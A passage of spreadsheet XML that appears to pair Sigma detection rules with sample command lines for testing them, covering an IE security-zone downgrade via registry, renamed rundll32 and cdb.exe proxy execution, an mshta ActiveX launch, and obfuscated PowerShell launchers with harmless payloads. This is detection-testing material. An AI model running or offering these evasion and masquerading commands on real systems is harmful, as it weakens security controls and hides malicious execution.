      <c r="I3599" s="43" t="n"/>
      <c r="J3599" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3599" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3600" ht="15.75" customHeight="1" s="42">
      <c r="A3600" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3600" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_aadinternals_cmdlets_execution</t>
        </is>
      </c>
      <c r="C3600" s="43" t="inlineStr">
        <is>
          <t>AADInternals PowerShell Cmdlets Execution - ProccessCreation</t>
        </is>
      </c>
      <c r="D3600" s="43" t="inlineStr">
        <is>
          <t>c86500e9-a645-4680-98d7-f882c70c1ea3</t>
        </is>
      </c>
      <c r="E3600" s="43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F3600" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3600" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3600" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3600" s="43" t="n"/>
      <c r="J3600" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3600" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3601" ht="15.75" customHeight="1" s="42">
      <c r="A3601" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3601" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_aadinternals_cmdlets_execution</t>
        </is>
      </c>
      <c r="C3601" s="43" t="inlineStr">
        <is>
          <t>AADInternals PowerShell Cmdlets Execution - ProccessCreation</t>
        </is>
      </c>
      <c r="D3601" s="43" t="inlineStr">
        <is>
          <t>c86500e9-a645-4680-98d7-f882c70c1ea3</t>
        </is>
      </c>
      <c r="E3601" s="43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F3601" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3601" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3601" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3601" s="43" t="n"/>
      <c r="J3601" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3601" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3602" ht="15.75" customHeight="1" s="42">
      <c r="A3602" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3602" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade</t>
        </is>
      </c>
      <c r="C3602" s="43" t="inlineStr">
        <is>
          <t>IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI</t>
        </is>
      </c>
      <c r="D3602" s="43" t="inlineStr">
        <is>
          <t>10344bb3-7f65-46c2-b915-2d00d47be5b0</t>
        </is>
      </c>
      <c r="E3602" s="43" t="inlineStr">
        <is>
          <t>reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v http /t REG_DWORD /d 0 /F &amp; reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v https /t REG_DWORD /d 0 /F</t>
        </is>
      </c>
      <c r="F3602" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3602" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3602" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3602" s="43" t="n"/>
      <c r="J3602" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3602" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3603" ht="15.75" customHeight="1" s="42">
      <c r="A3603" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3603" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade</t>
        </is>
      </c>
      <c r="C3603" s="43" t="inlineStr">
        <is>
          <t>IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI</t>
        </is>
      </c>
      <c r="D3603" s="43" t="inlineStr">
        <is>
          <t>10344bb3-7f65-46c2-b915-2d00d47be5b0</t>
        </is>
      </c>
      <c r="E3603" s="43" t="inlineStr">
        <is>
          <t>reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults /v http /t REG_DWORD /d 0 /F &amp; reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults /v https /t REG_DWORD /d 0 /F</t>
        </is>
      </c>
      <c r="F3603" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3603" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3603" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3603" s="43" t="n"/>
      <c r="J3603" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3603" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3604" ht="15.75" customHeight="1" s="42">
      <c r="A3604" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3604" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_rundll32_dllregisterserver</t>
        </is>
      </c>
      <c r="C3604" s="43" t="inlineStr">
        <is>
          <t>Potential Renamed Rundll32 Execution</t>
        </is>
      </c>
      <c r="D3604" s="43" t="inlineStr">
        <is>
          <t>2569ed8c-1147-498a-9b8c-2ad3656b10ed</t>
        </is>
      </c>
      <c r="E3604" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -noprofile -Command Write-Host DllRegisterServer export executed me; exit</t>
        </is>
      </c>
      <c r="F3604" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3604" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3604" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3604" s="43" t="n"/>
      <c r="J3604" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3604" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3605" ht="15.75" customHeight="1" s="42">
      <c r="A3605" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3605" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_rundll32_dllregisterserver</t>
        </is>
      </c>
      <c r="C3605" s="43" t="inlineStr">
        <is>
          <t>Potential Renamed Rundll32 Execution</t>
        </is>
      </c>
      <c r="D3605" s="43" t="inlineStr">
        <is>
          <t>2569ed8c-1147-498a-9b8c-2ad3656b10ed</t>
        </is>
      </c>
      <c r="E3605" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nop -c Write-Host DllRegisterServer export executed me; exit</t>
        </is>
      </c>
      <c r="F3605" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3605" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3605" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3605" s="43" t="n"/>
      <c r="J3605" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3605" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3606" ht="15.75" customHeight="1" s="42">
      <c r="A3606" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3606" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_rundll32_dllregisterserver</t>
        </is>
      </c>
      <c r="C3606" s="43" t="inlineStr">
        <is>
          <t>Potential Renamed Rundll32 Execution</t>
        </is>
      </c>
      <c r="D3606" s="43" t="inlineStr">
        <is>
          <t>2569ed8c-1147-498a-9b8c-2ad3656b10ed</t>
        </is>
      </c>
      <c r="E3606" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nop -Command "Write-Host DllRegisterServer export executed me; exit"</t>
        </is>
      </c>
      <c r="F3606" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3606" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3606" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3606" s="43" t="n"/>
      <c r="J3606" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3606" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3607" ht="15.75" customHeight="1" s="42">
      <c r="A3607" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B3607" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cdb_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C3607" s="43" t="inlineStr">
        <is>
          <t>Potential Binary Proxy Execution Via Cdb.EXE</t>
        </is>
      </c>
      <c r="D3607" s="43" t="inlineStr">
        <is>
          <t>b5c7395f-e501-4a08-94d4-57fe7a9da9d2</t>
        </is>
      </c>
      <c r="E3607" s="43" t="inlineStr">
        <is>
          <t>cdb.exe -cf script.txt</t>
        </is>
      </c>
      <c r="F3607" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3607" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3607" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3607" s="43" t="n"/>
      <c r="J3607" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3607" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3608" ht="15.75" customHeight="1" s="42">
      <c r="A3608" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B3608" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cdb_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C3608" s="43" t="inlineStr">
        <is>
          <t>Potential Binary Proxy Execution Via Cdb.EXE</t>
        </is>
      </c>
      <c r="D3608" s="43" t="inlineStr">
        <is>
          <t>b5c7395f-e501-4a08-94d4-57fe7a9da9d2</t>
        </is>
      </c>
      <c r="E3608" s="43" t="inlineStr">
        <is>
          <t>copy cdb.exe not_a_debugger.exe &amp;&amp; not_a_debugger.exe -cf script.txt</t>
        </is>
      </c>
      <c r="F3608" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3608" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3608" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3608" s="43" t="n"/>
      <c r="J3608" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3608" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3609" ht="15.75" customHeight="1" s="42">
      <c r="A3609" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B3609" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cdb_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C3609" s="43" t="inlineStr">
        <is>
          <t>Potential Binary Proxy Execution Via Cdb.EXE</t>
        </is>
      </c>
      <c r="D3609" s="43" t="inlineStr">
        <is>
          <t>b5c7395f-e501-4a08-94d4-57fe7a9da9d2</t>
        </is>
      </c>
      <c r="E3609" s="43" t="inlineStr">
        <is>
          <t>cdb.exe -command "!shell calc.exe"</t>
        </is>
      </c>
      <c r="F3609" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3609" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3609" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3609" s="43" t="n"/>
      <c r="J3609" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3609" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3610" ht="15.75" customHeight="1" s="42">
      <c r="A3610" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B3610" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cdb_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C3610" s="43" t="inlineStr">
        <is>
          <t>Potential Binary Proxy Execution Via Cdb.EXE</t>
        </is>
      </c>
      <c r="D3610" s="43" t="inlineStr">
        <is>
          <t>b5c7395f-e501-4a08-94d4-57fe7a9da9d2</t>
        </is>
      </c>
      <c r="E3610" s="43" t="inlineStr">
        <is>
          <t>cdb.exe -lines 10 -cf C:\path\to\script.txt calc.exe</t>
        </is>
      </c>
      <c r="F3610" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3610" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3610" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3610" s="43" t="n"/>
      <c r="J3610" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3610" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3611" ht="15.75" customHeight="1" s="42">
      <c r="A3611" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B3611" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cdb_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C3611" s="43" t="inlineStr">
        <is>
          <t>Potential Binary Proxy Execution Via Cdb.EXE</t>
        </is>
      </c>
      <c r="D3611" s="43" t="inlineStr">
        <is>
          <t>b5c7395f-e501-4a08-94d4-57fe7a9da9d2</t>
        </is>
      </c>
      <c r="E3611" s="43" t="inlineStr">
        <is>
          <t>copy cdb.exe not_cdb.exe &amp;&amp; not_cdb.exe -c</t>
        </is>
      </c>
      <c r="F3611" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3611" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3611" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3611" s="43" t="n"/>
      <c r="J3611" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3611" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3612" ht="15.75" customHeight="1" s="42">
      <c r="A3612" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B3612" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cdb_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C3612" s="43" t="inlineStr">
        <is>
          <t>Potential Binary Proxy Execution Via Cdb.EXE</t>
        </is>
      </c>
      <c r="D3612" s="43" t="inlineStr">
        <is>
          <t>b5c7395f-e501-4a08-94d4-57fe7a9da9d2</t>
        </is>
      </c>
      <c r="E3612" s="43" t="inlineStr">
        <is>
          <t>cdb.exe -c:"!shell calc.exe"</t>
        </is>
      </c>
      <c r="F3612" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3612" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3612" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3612" s="43" t="n"/>
      <c r="J3612" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3612" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3613" ht="15.75" customHeight="1" s="42">
      <c r="A3613" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B3613" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C3613" s="43" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D3613" s="43" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E3613" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe renamed_payload.dll,DllMain</t>
        </is>
      </c>
      <c r="F3613" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3613" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3613" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3613" s="43" t="n"/>
      <c r="J3613" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3613" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3614" ht="15.75" customHeight="1" s="42">
      <c r="A3614" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B3614" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C3614" s="43" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D3614" s="43" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E3614" s="43" t="inlineStr">
        <is>
          <t>copy rundll32.exe worker.exe &amp;&amp; worker.exe renamed_payload.dll,DllMain</t>
        </is>
      </c>
      <c r="F3614" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3614" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3614" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3614" s="43" t="n"/>
      <c r="J3614" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3614" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3615" ht="15.75" customHeight="1" s="42">
      <c r="A3615" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B3615" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C3615" s="43" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D3615" s="43" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E3615" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe GTHREA~1.DLL,DllMain</t>
        </is>
      </c>
      <c r="F3615" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3615" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3615" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3615" s="43" t="n"/>
      <c r="J3615" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3615" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3616" ht="15.75" customHeight="1" s="42">
      <c r="A3616" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B3616" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_susp_pattern</t>
        </is>
      </c>
      <c r="C3616" s="43" t="inlineStr">
        <is>
          <t>Suspicious Mshta.EXE Execution Patterns</t>
        </is>
      </c>
      <c r="D3616" s="43" t="inlineStr">
        <is>
          <t>e32f92d1-523e-49c3-9374-bdb13b46a3ba</t>
        </is>
      </c>
      <c r="E3616" s="43" t="inlineStr">
        <is>
          <t>copy mshta.exe DirectX.exe &amp;&amp; DirectX.exe javascript:a=(new ActiveXObject('WScript.Shell')).Run('calc.exe');window.close();</t>
        </is>
      </c>
      <c r="F3616" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3616" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3616" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3616" s="43" t="n"/>
      <c r="J3616" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3616" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3617" ht="15.75" customHeight="1" s="42">
      <c r="A3617" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3617" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C3617" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D3617" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E3617" s="43" t="inlineStr">
        <is>
          <t>cmd /c "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c "iex([System.Windows.Forms.Clipboard]::GetText())""</t>
        </is>
      </c>
      <c r="F3617" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3617" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3617" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3617" s="43" t="n"/>
      <c r="J3617" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3617" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3618" ht="15.75" customHeight="1" s="42">
      <c r="A3618" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3618" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C3618" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D3618" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E3618" s="43" t="inlineStr">
        <is>
          <t>cmd /c "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c "iex([System.Windows.Forms.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F3618" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3618" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3618" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3618" s="43" t="n"/>
      <c r="J3618" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3618" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3619" ht="15.75" customHeight="1" s="42">
      <c r="A3619" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3619" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C3619" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D3619" s="43" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E3619" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; ([string]::Join('' , ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F3619" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3619" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3619" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3619" s="43" t="n"/>
      <c r="J3619" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3619" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3620" ht="15.75" customHeight="1" s="42">
      <c r="A3620" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3620" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C3620" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D3620" s="43" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E3620" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c &amp; ([string]::Join('',([char]73,[char]69,[char]88))) 'Write-Host Educational_Test'</t>
        </is>
      </c>
      <c r="F3620" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3620" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3620" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3620" s="43" t="n"/>
      <c r="J3620" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3620" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3621" ht="15.75" customHeight="1" s="42">
      <c r="A3621" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3621" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C3621" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D3621" s="43" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E3621" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; ([string]([char]73+[char]69+[char]88)) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F3621" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3621" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3621" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3621" s="43" t="n"/>
      <c r="J3621" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3621" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3622" ht="15.75" customHeight="1" s="42">
      <c r="A3622" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3622" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C3622" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D3622" s="43" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E3622" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo Write-Host 'Bypass' | powershell.exe -noprofile -command -"</t>
        </is>
      </c>
      <c r="F3622" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3622" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3622" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3622" s="43" t="n"/>
      <c r="J3622" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3622" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3623" ht="15.75" customHeight="1" s="42">
      <c r="A3623" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3623" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C3623" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D3623" s="43" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E3623" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo Write-Host 'Bypass' | powershell.exe -noprofile -c -"</t>
        </is>
      </c>
      <c r="F3623" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3623" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3623" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3623" s="43" t="n"/>
      <c r="J3623" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3623" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3624" ht="15.75" customHeight="1" s="42">
      <c r="A3624" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3624" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C3624" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D3624" s="43" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E3624" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo Write-Host 'Bypass' | powershell -noprofile -command -"</t>
        </is>
      </c>
      <c r="F3624" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3624" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3624" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3624" s="43" t="n"/>
      <c r="J3624" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3624" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3625" ht="15.75" customHeight="1" s="42">
      <c r="A3625" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3625" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C3625" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D3625" s="43" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E3625" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "set VAR=Write-Output ''Execution Simulated'' &amp;&amp; powershell.exe -Command $env:VAR"</t>
        </is>
      </c>
      <c r="F3625" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3625" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3625" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3625" s="43" t="n"/>
      <c r="J3625" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3625" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3626" ht="15.75" customHeight="1" s="42">
      <c r="A3626" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3626" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C3626" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D3626" s="43" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E3626" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "set TEST=Write-Output ''Execution Simulated'' &amp;&amp; powershell.exe -Command $env:TEST"</t>
        </is>
      </c>
